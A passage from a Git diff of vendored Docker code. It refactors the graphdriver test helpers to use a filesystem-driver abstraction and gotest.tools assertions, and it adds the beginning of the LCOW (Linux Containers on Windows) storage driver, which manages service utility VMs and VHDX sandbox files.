root.MkdirAll(root.Join(root.Path(), dir), 0755) } func removeAll(drv graphdriver.Driver, layer string, names ...string) error { @@ -96,7 +95,7 @@ func removeAll(drv graphdriver.Driver, layer string, names ...string) error { defer drv.Put(layer) for _, filename := range names { - if err := os.RemoveAll(path.Join(root, filename)); err != nil { + if err := root.RemoveAll(root.Join(root.Path(), filename)); err != nil { return err } } @@ -110,8 +109,8 @@ func checkFileRemoved(drv graphdriver.Driver, layer, filename string) error { } defer drv.Put(layer) - if _, err := os.Stat(path.Join(root, filename)); err == nil { - return fmt.Errorf("file still exists: %s", path.Join(root, filename)) + if _, err := root.Stat(root.Join(root.Path(), filename)); err == nil { + return fmt.Errorf("file still exists: %s", root.Join(root.Path(), filename)) } else if !os.IsNotExist(err) { return err } @@ -127,13 +126,13 @@ func addManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) e defer drv.Put(layer) for i := 0; i < count; i += 100 { - dir := path.Join(root, fmt.Sprintf("directory-%d", i)) - if err := os.MkdirAll(dir, 0755); err != nil { + dir := root.Join(root.Path(), fmt.Sprintf("directory-%d", i)) + if err := root.MkdirAll(dir, 0755); err != nil { return err } for j := 0; i+j < count && j < 100; j++ { - file := path.Join(dir, fmt.Sprintf("file-%d", i+j)) - if err := ioutil.WriteFile(file, randomContent(64, seed+int64(i+j)), 0755); err != nil { + file := root.Join(dir, fmt.Sprintf("file-%d", i+j)) + if err := driver.WriteFile(root, file, randomContent(64, seed+int64(i+j)), 0755); err != nil { return err } } @@ -149,10 +148,10 @@ func changeManyFiles(drv graphdriver.Driver, layer string, count int, seed int64 } defer drv.Put(layer) - changes := []archive.Change{} + var changes []archive.Change for i := 0; i < count; i += 100 { archiveRoot := fmt.Sprintf("/directory-%d", i) - if err := os.MkdirAll(path.Join(root, archiveRoot), 0755); err != nil { + if err := root.MkdirAll(root.Join(root.Path(), archiveRoot), 0755); err != nil { return nil, err } for j := 0; i+j < count && j < 100; j++ { @@ -166,23 +165,23 @@ func changeManyFiles(drv graphdriver.Driver, layer string, count int, seed int64 switch j % 3 { // Update file case 0: - change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) + change.Path = root.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) change.Kind = archive.ChangeModify - if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { return nil, err } // Add file case 1: - change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d-%d", seed, i+j)) + change.Path = root.Join(archiveRoot, fmt.Sprintf("file-%d-%d", seed, i+j)) change.Kind = archive.ChangeAdd - if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { return nil, err } // Remove file case 2: - change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) + change.Path = root.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) change.Kind = archive.ChangeDelete - if err := os.Remove(path.Join(root, change.Path)); err != nil { + if err := root.Remove(root.Join(root.Path(), change.Path)); err != nil { return nil, err } } @@ -201,17 +200,17 @@ func checkManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) defer drv.Put(layer) for i := 0; i < count; i += 100 { - dir := path.Join(root, fmt.Sprintf("directory-%d", i)) + dir := root.Join(root.Path(), fmt.Sprintf("directory-%d", i)) for j := 0; i+j < count && j < 100; j++ { - file := path.Join(dir, fmt.Sprintf("file-%d", i+j)) - fileContent, err := ioutil.ReadFile(file) + file := root.Join(dir, fmt.Sprintf("file-%d", i+j)) + fileContent, err := driver.ReadFile(root, file) if err != nil { return err } content := randomContent(64, seed+int64(i+j)) - if bytes.Compare(fileContent, content) != 0 { + if !bytes.Equal(fileContent, content) { return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content) } } @@ -254,21 +253,17 @@ func addLayerFiles(drv graphdriver.Driver, layer, parent string, i int) error { } defer drv.Put(layer) - if err := ioutil.WriteFile(path.Join(root, "top-id"), []byte(layer), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(root.Path(), "top-id"), []byte(layer), 0755); err != nil { return err } - layerDir := path.Join(root, fmt.Sprintf("layer-%d", i)) - if err := os.MkdirAll(layerDir, 0755); err != nil { + layerDir := root.Join(root.Path(), fmt.Sprintf("layer-%d", i)) + if err := root.MkdirAll(layerDir, 0755); err != nil { return err } - if err := ioutil.WriteFile(path.Join(layerDir, "layer-id"), []byte(layer), 0755); err != nil { + if err := driver.WriteFile(root, root.Join(layerDir, "layer-id"), []byte(layer), 0755); err != nil { return err } - if err := ioutil.WriteFile(path.Join(layerDir, "parent-id"), []byte(parent), 0755); err != nil { - return err - } - - return nil + return driver.WriteFile(root, root.Join(layerDir, "parent-id"), []byte(parent), 0755) } func addManyLayers(drv graphdriver.Driver, baseLayer string, count int) (string, error) { @@ -295,26 +290,26 @@ func checkManyLayers(drv graphdriver.Driver, layer string, count int) error { } defer drv.Put(layer) - layerIDBytes, err := ioutil.ReadFile(path.Join(root, "top-id")) + layerIDBytes, err := driver.ReadFile(root, root.Join(root.Path(), "top-id")) if err != nil { return err } - if bytes.Compare(layerIDBytes, []byte(layer)) != 0 { + if !bytes.Equal(layerIDBytes, []byte(layer)) { return fmt.Errorf("mismatched file content %v, expecting %v", layerIDBytes, []byte(layer)) } for i := count; i > 0; i-- { - layerDir := path.Join(root, fmt.Sprintf("layer-%d", i)) + layerDir := root.Join(root.Path(), fmt.Sprintf("layer-%d", i)) - thisLayerIDBytes, err := ioutil.ReadFile(path.Join(layerDir, "layer-id")) + thisLayerIDBytes, err := driver.ReadFile(root, root.Join(layerDir, "layer-id")) if err != nil { return err } - if bytes.Compare(thisLayerIDBytes, layerIDBytes) != 0 { + if !bytes.Equal(thisLayerIDBytes, layerIDBytes) { return fmt.Errorf("mismatched file content %v, expecting %v", thisLayerIDBytes, layerIDBytes) } - layerIDBytes, err = ioutil.ReadFile(path.Join(layerDir, "parent-id")) + layerIDBytes, err = driver.ReadFile(root, root.Join(layerDir, "parent-id")) if err != nil { return err } @@ -322,11 +317,11 @@ func checkManyLayers(drv graphdriver.Driver, layer string, count int) error { return nil } -// readDir reads a directory just like ioutil.ReadDir() +// readDir reads a directory just like driver.ReadDir() // then hides specific files (currently "lost+found") // so the tests don't "see" it -func readDir(dir string) ([]os.FileInfo, error) { - a, err := ioutil.ReadDir(dir) +func readDir(r driver.Driver, dir string) ([]os.FileInfo, error) { + a, err := driver.ReadDir(r, dir) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go index 49b0c2cc35..6871dca09a 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go @@ -1,143 +1,69 @@ // +build linux freebsd -package graphtest +package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest" import ( - "fmt" - "io/ioutil" "os" - "path" "syscall" "testing" + contdriver "github.com/containerd/continuity/driver" "github.com/docker/docker/daemon/graphdriver" + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -// InitLoopbacks ensures that the loopback devices are properly created within -// the system running the device mapper tests. -func InitLoopbacks() error { - statT, err := getBaseLoopStats() - if err != nil { - return err - } - // create at least 8 loopback files, ya, that is a good number - for i := 0; i < 8; i++ { - loopPath := fmt.Sprintf("/dev/loop%d", i) - // only create new loopback files if they don't exist - if _, err := os.Stat(loopPath); err != nil { - if mkerr := syscall.Mknod(loopPath, - uint32(statT.Mode|syscall.S_IFBLK), int((7<<8)|(i&0xff)|((i&0xfff00)<<12))); mkerr != nil { - return mkerr - } - os.Chown(loopPath, int(statT.Uid), int(statT.Gid)) - } - } - return nil -} - -// getBaseLoopStats inspects /dev/loop0 to collect uid,gid, and mode for the -// loop0 device on the system. If it does not exist we assume 0,0,0660 for the -// stat data -func getBaseLoopStats() (*syscall.Stat_t, error) { - loop0, err := os.Stat("/dev/loop0") - if err != nil { - if os.IsNotExist(err) { - return &syscall.Stat_t{ - Uid: 0, - Gid: 0, - Mode: 0660, - }, nil - } - return nil, err - } - return loop0.Sys().(*syscall.Stat_t), nil -} - func verifyFile(t testing.TB, path string, mode os.FileMode, uid, gid uint32) { fi, err := os.Stat(path) - if err != nil { - t.Fatal(err) - } - - if fi.Mode()&os.ModeType != mode&os.ModeType { - t.Fatalf("Expected %s type 0x%x, got 0x%x", path, mode&os.ModeType, fi.Mode()&os.ModeType) - } + assert.NilError(t, err) - if fi.Mode()&os.ModePerm != mode&os.ModePerm { - t.Fatalf("Expected %s mode %o, got %o", path, mode&os.ModePerm, fi.Mode()&os.ModePerm) - } - - if fi.Mode()&os.ModeSticky != mode&os.ModeSticky { - t.Fatalf("Expected %s sticky 0x%x, got 0x%x", path, mode&os.ModeSticky, fi.Mode()&os.ModeSticky) - } - - if fi.Mode()&os.ModeSetuid != mode&os.ModeSetuid { - t.Fatalf("Expected %s setuid 0x%x, got 0x%x", path, mode&os.ModeSetuid, fi.Mode()&os.ModeSetuid) - } - - if fi.Mode()&os.ModeSetgid != mode&os.ModeSetgid { - t.Fatalf("Expected %s setgid 0x%x, got 0x%x", path, mode&os.ModeSetgid, fi.Mode()&os.ModeSetgid) - } + actual := fi.Mode() + assert.Check(t, is.Equal(mode&os.ModeType, actual&os.ModeType), path) + assert.Check(t, is.Equal(mode&os.ModePerm, actual&os.ModePerm), path) + assert.Check(t, is.Equal(mode&os.ModeSticky, actual&os.ModeSticky), path) + assert.Check(t, is.Equal(mode&os.ModeSetuid, actual&os.ModeSetuid), path) + assert.Check(t, is.Equal(mode&os.ModeSetgid, actual&os.ModeSetgid), path) if stat, ok := fi.Sys().(*syscall.Stat_t); ok { - if stat.Uid != uid { - t.Fatalf("%s no owned by uid %d", path, uid) - } - if stat.Gid != gid { - t.Fatalf("%s not owned by gid %d", path, gid) - } + assert.Check(t, is.Equal(uid, stat.Uid), path) + assert.Check(t, is.Equal(gid, stat.Gid), path) } } func createBase(t testing.TB, driver graphdriver.Driver, name string) { // We need to be able to set any perms - oldmask := syscall.Umask(0) - defer syscall.Umask(oldmask) + oldmask := unix.Umask(0) + defer unix.Umask(oldmask) - if err := driver.CreateReadWrite(name, "", nil); err != nil { - t.Fatal(err) - } + err := driver.CreateReadWrite(name, "", nil) + assert.NilError(t, err) - dir, err := driver.Get(name, "") - if err != nil { - t.Fatal(err) - } + dirFS, err := driver.Get(name, "") + assert.NilError(t, err) defer driver.Put(name) - subdir := path.Join(dir, "a subdir") - if err := os.Mkdir(subdir, 0705|os.ModeSticky); err != nil { - t.Fatal(err) - } - if err := os.Chown(subdir, 1, 2); err != nil { - t.Fatal(err) - } + subdir := dirFS.Join(dirFS.Path(), "a subdir") + assert.NilError(t, dirFS.Mkdir(subdir, 0705|os.ModeSticky)) + assert.NilError(t, dirFS.Lchown(subdir, 1, 2)) - file := path.Join(dir, "a file") - if err := ioutil.WriteFile(file, []byte("Some data"), 0222|os.ModeSetuid); err != nil { - t.Fatal(err) - } + file := dirFS.Join(dirFS.Path(), "a file") + err = contdriver.WriteFile(dirFS, file, []byte("Some data"), 0222|os.ModeSetuid) + assert.NilError(t, err) } func verifyBase(t testing.TB, driver graphdriver.Driver, name string) { - dir, err := driver.Get(name, "") - if err != nil { - t.Fatal(err) - } + dirFS, err := driver.Get(name, "") + assert.NilError(t, err) defer driver.Put(name) - subdir := path.Join(dir, "a subdir") + subdir := dirFS.Join(dirFS.Path(), "a subdir") verifyFile(t, subdir, 0705|os.ModeDir|os.ModeSticky, 1, 2) - file := path.Join(dir, "a file") + file := dirFS.Join(dirFS.Path(), "a file") verifyFile(t, file, 0222|os.ModeSetuid, 0, 0) - fis, err := readDir(dir) - if err != nil { - t.Fatal(err) - } - - if len(fis) != 2 { - t.Fatal("Unexpected files in base image") - } - + files, err := readDir(dirFS, dirFS.Path()) + assert.NilError(t, err) + assert.Check(t, is.Len(files, 2)) } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go new file mode 100644 index 0000000000..649beccdc6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow.go @@ -0,0 +1,1052 @@ +// +build windows + +// Maintainer: jhowardmsft +// Locale: en-gb +// About: Graph-driver for Linux Containers On Windows (LCOW) +// +// This graphdriver runs in two modes. Yet to be determined which one will +// be the shipping mode. The global mode is where a single utility VM +// is used for all service VM tool operations. This isn't safe security-wise +// as it's attaching a sandbox of multiple containers to it, containing +// untrusted data. This may be fine for client devops scenarios. In +// safe mode, a unique utility VM is instantiated for all service VM tool +// operations. The downside of safe-mode is that operations are slower as +// a new service utility VM has to be started and torn-down when needed. +// +// Options: +// +// The following options are read by the graphdriver itself: +// +// * lcow.globalmode - Enables global service VM Mode +// -- Possible values: true/false +// -- Default if omitted: false +// +// * lcow.sandboxsize - Specifies a custom sandbox size in GB for starting a container +// -- Possible values: >= default sandbox size (opengcs defined, currently 20) +// -- Default if omitted: 20 +// +// The following options are read by opengcs: +// +// * lcow.kirdpath - Specifies a custom path to a kernel/initrd pair +// -- Possible values: Any local path that is not a mapped drive +// -- Default if omitted: %ProgramFiles%\Linux Containers +// +// * lcow.kernel - Specifies a custom kernel file located in the `lcow.kirdpath` path +// -- Possible values: Any valid filename +// -- Default if omitted: bootx64.efi +// +// * lcow.initrd - Specifies a custom initrd file located in the `lcow.kirdpath` path +// -- Possible values: Any valid filename +// -- Default if omitted: initrd.img +// +// * lcow.bootparameters - Specifies additional boot parameters for booting in kernel+initrd mode +// -- Possible values: Any valid linux kernel boot options +// -- Default if omitted: +// +// * lcow.vhdx - Specifies a custom vhdx file to boot (instead of a kernel+initrd) +// -- Possible values: Any valid filename +// -- Default if omitted: uvm.vhdx under `lcow.kirdpath` +// +// * lcow.timeout - Specifies a timeout for utility VM operations in seconds +// -- Possible values: >=0 +// -- Default if omitted: 300 + +// TODO: Grab logs from SVM at terminate or errors + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "os" + "path" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/Microsoft/hcsshim" + "github.com/Microsoft/opengcs/client" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" +) + +// init registers this driver to the register. It gets initialised by the +// function passed in the second parameter, implemented in this file. +func init() { + graphdriver.Register("lcow", InitDriver) +} + +const ( + // sandboxFilename is the name of the file containing a layer's sandbox (read-write layer). + sandboxFilename = "sandbox.vhdx" + + // scratchFilename is the name of the scratch-space used by an SVM to avoid running out of memory. + scratchFilename = "scratch.vhdx" + + // layerFilename is the name of the file containing a layer's read-only contents. + // Note this really is VHD format, not VHDX. + layerFilename = "layer.vhd" + + // toolsScratchPath is a location in a service utility VM that the tools can use as a + // scratch space to avoid running out of memory. + toolsScratchPath = "/tmp/scratch" + + // svmGlobalID is the ID used in the serviceVMs map for the global service VM when running in "global" mode. + svmGlobalID = "_lcow_global_svm_" + + // cacheDirectory is the sub-folder under the driver's data-root used to cache blank sandbox and scratch VHDs. + cacheDirectory = "cache" + + // scratchDirectory is the sub-folder under the driver's data-root used for scratch VHDs in service VMs + scratchDirectory = "scratch" + + // errOperationPending is the HRESULT returned by the HCS when the VM termination operation is still pending. + errOperationPending syscall.Errno = 0xc0370103 +) + +// Driver represents an LCOW graph driver. +type Driver struct { + dataRoot string // Root path on the host where we are storing everything. + cachedSandboxFile string // Location of the local default-sized cached sandbox. + cachedSandboxMutex sync.Mutex // Protects race conditions from multiple threads creating the cached sandbox. + cachedScratchFile string // Location of the local cached empty scratch space. + cachedScratchMutex sync.Mutex // Protects race conditions from multiple threads creating the cached scratch. + options []string // Graphdriver options we are initialised with. + globalMode bool // Indicates if running in an unsafe/global service VM mode. + + // NOTE: It is OK to use a cache here because Windows does not support + // restoring containers when the daemon dies. + serviceVms *serviceVMMap // Map of the configs representing the service VM(s) we are running. +} + +// layerDetails is the structure returned by a helper function `getLayerDetails` +// for getting information about a layer folder +type layerDetails struct { + filename string // \path\to\sandbox.vhdx or \path\to\layer.vhd + size int64 // size of the above file + isSandbox bool // true if sandbox.vhdx +} + +// deletefiles is a helper function for initialisation where we delete any +// left-over scratch files in case we were previously forcibly terminated. +func deletefiles(path string, f os.FileInfo, err error) error { + if strings.HasSuffix(f.Name(), ".vhdx") { + logrus.Warnf("lcowdriver: init: deleting stale scratch file %s", path) + return os.Remove(path) + } + return nil +} + +// InitDriver returns a new LCOW storage driver. +func InitDriver(dataRoot string, options []string, _, _ []idtools.IDMap) (graphdriver.Driver, error) { + title := "lcowdriver: init:" + + cd := filepath.Join(dataRoot, cacheDirectory) + sd := filepath.Join(dataRoot, scratchDirectory) + + d := &Driver{ + dataRoot: dataRoot, + options: options, + cachedSandboxFile: filepath.Join(cd, sandboxFilename), + cachedScratchFile: filepath.Join(cd, scratchFilename), + serviceVms: &serviceVMMap{ + svms: make(map[string]*serviceVMMapItem), + }, + globalMode: false, + } + + // Looks for relevant options + for _, v := range options { + opt := strings.SplitN(v, "=", 2) + if len(opt) == 2 { + switch strings.ToLower(opt[0]) { + case "lcow.globalmode": + var err error + d.globalMode, err = strconv.ParseBool(opt[1]) + if err != nil { + return nil, fmt.Errorf("%s failed to parse value for 'lcow.globalmode' - must be 'true' or 'false'", title) + } + break + } + } + } + + // Make sure the dataRoot directory is created + if err := idtools.MkdirAllAndChown(dataRoot, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil { + return nil, fmt.Errorf("%s failed to create '%s': %v", title, dataRoot, err) + } + + // Make sure the cache directory is created under dataRoot + if err := idtools.MkdirAllAndChown(cd, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil { + return nil, fmt.Errorf("%s failed to create '%s': %v", title, cd, err) + } + + // Make sure the scratch directory is created under dataRoot + if err := idtools.MkdirAllAndChown(sd, 0700, idtools.IDPair{UID: 0, GID: 0}); err != nil { + return nil, fmt.Errorf("%s failed to create '%s': %v", title, sd, err) + } + + // Delete any items in the scratch directory + filepath.Walk(sd, deletefiles) + + logrus.Infof("%s dataRoot: %s globalMode: %t", title, dataRoot, d.globalMode) + + return d, nil +} + +func (d *Driver) getVMID(id string) string { + if d.globalMode { + return svmGlobalID + } + return id +} + +// startServiceVMIfNotRunning starts a service utility VM if it is not currently running. +// It can optionally be started with a mapped virtual disk. Returns a opengcs config structure +// representing the VM. +func (d *Driver) startServiceVMIfNotRunning(id string, mvdToAdd []hcsshim.MappedVirtualDisk, context string) (_ *serviceVM, err error) { + // Use the global ID if in global mode + id = d.getVMID(id) + + title := fmt.Sprintf("lcowdriver: startservicevmifnotrunning %s:", id) + + // Attempt to add ID to the service vm map + logrus.Debugf("%s: Adding entry to service vm map", title) + svm, exists, err := d.serviceVms.add(id) + if err != nil && err == errVMisTerminating { + // VM is in the process of terminating. Wait until it's done and and then try again + logrus.Debugf("%s: VM with current ID still in the process of terminating: %s", title, id) + if err := svm.getStopError(); err != nil { + logrus.Debugf("%s: VM %s did not stop successfully: %s", title, id, err) + return nil, err + } + return d.startServiceVMIfNotRunning(id, mvdToAdd, context) + } else if err != nil { + logrus.Debugf("%s: failed to add service vm to map: %s", err) + return nil, fmt.Errorf("%s: failed to add to service vm map: %s", title, err) + } + + if exists { + // Service VM is already up and running. In this case, just hot add the vhds. + logrus.Debugf("%s: service vm already exists. Just hot adding: %+v", title, mvdToAdd) + if err := svm.hotAddVHDs(mvdToAdd...); err != nil { + logrus.Debugf("%s: failed to hot add vhds on service vm creation: %s", title, err) + return nil, fmt.Errorf("%s: failed to hot add vhds on service vm: %s", title, err) + } + return svm, nil + } + + // We are the first service for this id, so we need to start it + logrus.Debugf("%s: service vm doesn't exist. Now starting it up: %s", title, id) + + defer func() { + // Signal that start has finished, passing in the error if any. + svm.signalStartFinished(err) + if err != nil { + // We added a ref to the VM, since we failed, we should delete the ref. + d.terminateServiceVM(id, "error path on startServiceVMIfNotRunning", false) + } + }() + + // Generate a default configuration + if err := svm.config.GenerateDefault(d.options); err != nil { + return nil, fmt.Errorf("%s failed to generate default gogcs configuration for global svm (%s): %s", title, context, err) + } + + // For the name, we deliberately suffix if safe-mode to ensure that it doesn't + // clash with another utility VM which may be running for the container itself. + // This also makes it easier to correlate through Get-ComputeProcess. + if id == svmGlobalID { + svm.config.Name = svmGlobalID + } else { + svm.config.Name = fmt.Sprintf("%s_svm", id) + } + + // Ensure we take the cached scratch mutex around the check to ensure the file is complete + // and not in the process of being created by another thread. + scratchTargetFile := filepath.Join(d.dataRoot, scratchDirectory, fmt.Sprintf("%s.vhdx", id)) + + logrus.Debugf("%s locking cachedScratchMutex", title) + d.cachedScratchMutex.Lock() + if _, err := os.Stat(d.cachedScratchFile); err == nil { + // Make a copy of cached scratch to the scratch directory + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) cloning cached scratch for mvd", context) + if err := client.CopyFile(d.cachedScratchFile, scratchTargetFile, true); err != nil { + logrus.Debugf("%s releasing cachedScratchMutex on err: %s", title, err) + d.cachedScratchMutex.Unlock() + return nil, err + } + + // Add the cached clone as a mapped virtual disk + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) adding cloned scratch as mvd", context) + mvd := hcsshim.MappedVirtualDisk{ + HostPath: scratchTargetFile, + ContainerPath: toolsScratchPath, + CreateInUtilityVM: true, + } + svm.config.MappedVirtualDisks = append(svm.config.MappedVirtualDisks, mvd) + svm.scratchAttached = true + } + + logrus.Debugf("%s releasing cachedScratchMutex", title) + d.cachedScratchMutex.Unlock() + + // If requested to start it with a mapped virtual disk, add it now. + svm.config.MappedVirtualDisks = append(svm.config.MappedVirtualDisks, mvdToAdd...) + for _, mvd := range svm.config.MappedVirtualDisks { + svm.attachedVHDs[mvd.HostPath] = 1 + } + + // Start it. + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) starting %s", context, svm.config.Name) + if err := svm.config.StartUtilityVM(); err != nil { + return nil, fmt.Errorf("failed to start service utility VM (%s): %s", context, err) + } + + // defer function to terminate the VM if the next steps fail + defer func() { + if err != nil { + waitTerminate(svm, fmt.Sprintf("startServiceVmIfNotRunning: %s (%s)", id, context)) + } + }() + + // Now we have a running service VM, we can create the cached scratch file if it doesn't exist. + logrus.Debugf("%s locking cachedScratchMutex", title) + d.cachedScratchMutex.Lock() + if _, err := os.Stat(d.cachedScratchFile); err != nil { + logrus.Debugf("%s (%s): creating an SVM scratch", title, context) + + // Don't use svm.CreateExt4Vhdx since that only works when the service vm is setup, + // but we're still in that process right now. + if err := svm.config.CreateExt4Vhdx(scratchTargetFile, client.DefaultVhdxSizeGB, d.cachedScratchFile); err != nil { + logrus.Debugf("%s (%s): releasing cachedScratchMutex on error path", title, context) + d.cachedScratchMutex.Unlock() + logrus.Debugf("%s: failed to create vm scratch %s: %s", title, scratchTargetFile, err) + return nil, fmt.Errorf("failed to create SVM scratch VHDX (%s): %s", context, err) + } + } + logrus.Debugf("%s (%s): releasing cachedScratchMutex", title, context) + d.cachedScratchMutex.Unlock() + + // Hot-add the scratch-space if not already attached + if !svm.scratchAttached { + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) hot-adding scratch %s", context, scratchTargetFile) + if err := svm.hotAddVHDsAtStart(hcsshim.MappedVirtualDisk{ + HostPath: scratchTargetFile, + ContainerPath: toolsScratchPath, + CreateInUtilityVM: true, + }); err != nil { + logrus.Debugf("%s: failed to hot-add scratch %s: %s", title, scratchTargetFile, err) + return nil, fmt.Errorf("failed to hot-add %s failed: %s", scratchTargetFile, err) + } + svm.scratchAttached = true + } + + logrus.Debugf("lcowdriver: startServiceVmIfNotRunning: (%s) success", context) + return svm, nil +} + +// terminateServiceVM terminates a service utility VM if its running if it's, +// not being used by any goroutine, but does nothing when in global mode as it's +// lifetime is limited to that of the daemon. If the force flag is set, then +// the VM will be killed regardless of the ref count or if it's global. +func (d *Driver) terminateServiceVM(id, context string, force bool) (err error) { + // We don't do anything in safe mode unless the force flag has been passed, which + // is only the case for cleanup at driver termination. + if d.globalMode && !force { + logrus.Debugf("lcowdriver: terminateservicevm: %s (%s) - doing nothing as in global mode", id, context) + return nil + } + + id = d.getVMID(id) + + var svm *serviceVM + var lastRef bool + if !force { + // In the not force case, we ref count + svm, lastRef, err = d.serviceVms.decrementRefCount(id) + } else { + // In the force case, we ignore the ref count and just set it to 0 + svm, err = d.serviceVms.setRefCountZero(id) + lastRef = true + } + + if err == errVMUnknown { + return nil + } else if err == errVMisTerminating { + return svm.getStopError() + } else if !lastRef { + return nil + } + + // We run the deletion of the scratch as a deferred function to at least attempt + // clean-up in case of errors. + defer func() { + if svm.scratchAttached { + scratchTargetFile := filepath.Join(d.dataRoot, scratchDirectory, fmt.Sprintf("%s.vhdx", id)) + logrus.Debugf("lcowdriver: terminateservicevm: %s (%s) - deleting scratch %s", id, context, scratchTargetFile) + if errRemove := os.Remove(scratchTargetFile); errRemove != nil { + logrus.Warnf("failed to remove scratch file %s (%s): %s", scratchTargetFile, context, errRemove) + err = errRemove + } + } + + // This function shouldn't actually return error unless there is a bug + if errDelete := d.serviceVms.deleteID(id); errDelete != nil { + logrus.Warnf("failed to service vm from svm map %s (%s): %s", id, context, errDelete) + } + + // Signal that this VM has stopped + svm.signalStopFinished(err) + }() + + // Now it's possible that the service VM failed to start and now we are trying to terminate it. + // In this case, we will relay the error to the goroutines waiting for this vm to stop. + if err := svm.getStartError(); err != nil { + logrus.Debugf("lcowdriver: terminateservicevm: %s had failed to start up: %s", id, err) + return err + } + + if err := waitTerminate(svm, fmt.Sprintf("terminateservicevm: %s (%s)", id, context)); err != nil { + return err + } + + logrus.Debugf("lcowdriver: terminateservicevm: %s (%s) - success", id, context) + return nil +} + +func waitTerminate(svm *serviceVM, context string) error { + if svm.config == nil { + return fmt.Errorf("lcowdriver: waitTermiante: Nil utility VM. %s", context) + } + + logrus.Debugf("lcowdriver: waitTerminate: Calling terminate: %s", context) + if err := svm.config.Uvm.Terminate(); err != nil { + // We might get operation still pending from the HCS. In that case, we shouldn't return + // an error since we call wait right after. + underlyingError := err + if conterr, ok := err.(*hcsshim.ContainerError); ok { + underlyingError = conterr.Err + } + + if syscallErr, ok := underlyingError.(syscall.Errno); ok { + underlyingError = syscallErr + } + + if underlyingError != errOperationPending { + return fmt.Errorf("failed to terminate utility VM (%s): %s", context, err) + } + logrus.Debugf("lcowdriver: waitTerminate: uvm.Terminate() returned operation pending (%s)", context) + } + + logrus.Debugf("lcowdriver: waitTerminate: (%s) - waiting for utility VM to terminate", context) + if err := svm.config.Uvm.WaitTimeout(time.Duration(svm.config.UvmTimeoutSeconds) * time.Second); err != nil { + return fmt.Errorf("failed waiting for utility VM to terminate (%s): %s", context, err) + } + return nil +} + +// String returns the string representation of a driver. This should match +// the name the graph driver has been registered with. +func (d *Driver) String() string { + return "lcow" +} + +// Status returns the status of the driver. +func (d *Driver) Status() [][2]string { + return [][2]string{ + {"LCOW", ""}, + // TODO: Add some more info here - mode, home, .... + } +} + +// Exists returns true if the given id is registered with this driver. +func (d *Driver) Exists(id string) bool { + _, err := os.Lstat(d.dir(id)) + logrus.Debugf("lcowdriver: exists: id %s %t", id, err == nil) + return err == nil +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. That equates to creating a sandbox. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + title := fmt.Sprintf("lcowdriver: createreadwrite: id %s", id) + logrus.Debugf(title) + + // First we need to create the folder + if err := d.Create(id, parent, opts); err != nil { + return err + } + + // Look for an explicit sandbox size option. + sandboxSize := uint64(client.DefaultVhdxSizeGB) + for k, v := range opts.StorageOpt { + switch strings.ToLower(k) { + case "lcow.sandboxsize": + var err error + sandboxSize, err = strconv.ParseUint(v, 10, 32) + if err != nil { + return fmt.Errorf("%s failed to parse value '%s' for 'lcow.sandboxsize'", title, v) + } + if sandboxSize < client.DefaultVhdxSizeGB { + return fmt.Errorf("%s 'lcow.sandboxsize' option cannot be less than %d", title, client.DefaultVhdxSizeGB) + } + break + } + } + + // Massive perf optimisation here. If we know that the RW layer is the default size, + // and that the cached sandbox already exists, and we are running in safe mode, we + // can just do a simple copy into the layers sandbox file without needing to start a + // unique service VM. For a global service VM, it doesn't really matter. Of course, + // this is only the case where the sandbox is the default size. + // + // Make sure we have the sandbox mutex taken while we are examining it. + if sandboxSize == client.DefaultVhdxSizeGB { + logrus.Debugf("%s: locking cachedSandboxMutex", title) + d.cachedSandboxMutex.Lock() + _, err := os.Stat(d.cachedSandboxFile) + logrus.Debugf("%s: releasing cachedSandboxMutex", title) + d.cachedSandboxMutex.Unlock() + if err == nil { + logrus.Debugf("%s: using cached sandbox to populate", title) + if err := client.CopyFile(d.cachedSandboxFile, filepath.Join(d.dir(id), sandboxFilename), true); err != nil { + return err + } + return nil + } + } + + logrus.Debugf("%s: creating SVM to create sandbox", title) + svm, err := d.startServiceVMIfNotRunning(id, nil, "createreadwrite") + if err != nil { + return err + } + defer d.terminateServiceVM(id, "createreadwrite", false) + + // So the sandbox needs creating. If default size ensure we are the only thread 